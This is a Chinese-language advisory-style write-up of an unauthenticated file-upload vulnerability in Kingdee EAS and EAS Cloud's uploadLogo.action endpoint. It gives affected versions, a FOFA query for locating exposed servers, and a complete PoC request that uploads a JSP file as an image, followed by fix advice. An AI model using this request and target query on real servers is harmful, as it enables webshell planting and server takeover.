0x01 产品简介
金蝶EAS Cloud为集团型企业提供功能全面、性能稳定、扩展性强的数字化平台,帮助企业链接外部产业链上下游,实现信息共享、风险共担,优化生态圈资源配置,构筑产业生态的护城河,同时打通企业内部价值链的数据链条,实现数据不落地,管理无断点,支撑“横向到边”财务业务的一体化协同和“纵向到底”集团战略的一体化管控,帮助企业强化核心竞争力。
0x02 漏洞概述
金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,未经身份认证的攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
0x03 影响范围
EAS 8.0、EAS 8.1、EAS 8.2、EAS 8.5、EAS Cloud 8.6私有云、EAS Cloud 8.6公有云
EAS Cloud 8.6SP1、EAS Cloud 8.8
0x04 复现环境
FOFA:app="Kingdee-EAS"
0x05 漏洞复现
PoC
POST /plt_portal/setting/uploadLogo.action HTTP/1.1
Host: your-ip
User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=04844569c7ca7d21a3ca115dca477d62
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="chooseLanguage_top"; filename="chooseLanguage_top"
ab
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="dataCenter"; filename="dataCenter"
ac
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="insId"; filename="insId"
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="type"; filename="type"
ad
--04844569c7ca7d21a3ca115dca477d62
Content-Disposition: form-data; name="upload"; filename="1.jsp"
Content-Type: image/png
<%out.print("test");%>
--04844569c7ca7d21a3ca115dca477d62--
PS:响应体会回显上传后的文件名
验证url
http://your-ip/portal/res/file/upload/回显的文件名.jsp
命令执行
0x06 修复建议
关闭互联网暴露面或接口设置访问控制权限
严格限制和校验上传的文件、限制上传的文件路径
文件上传后不回显上传文件名
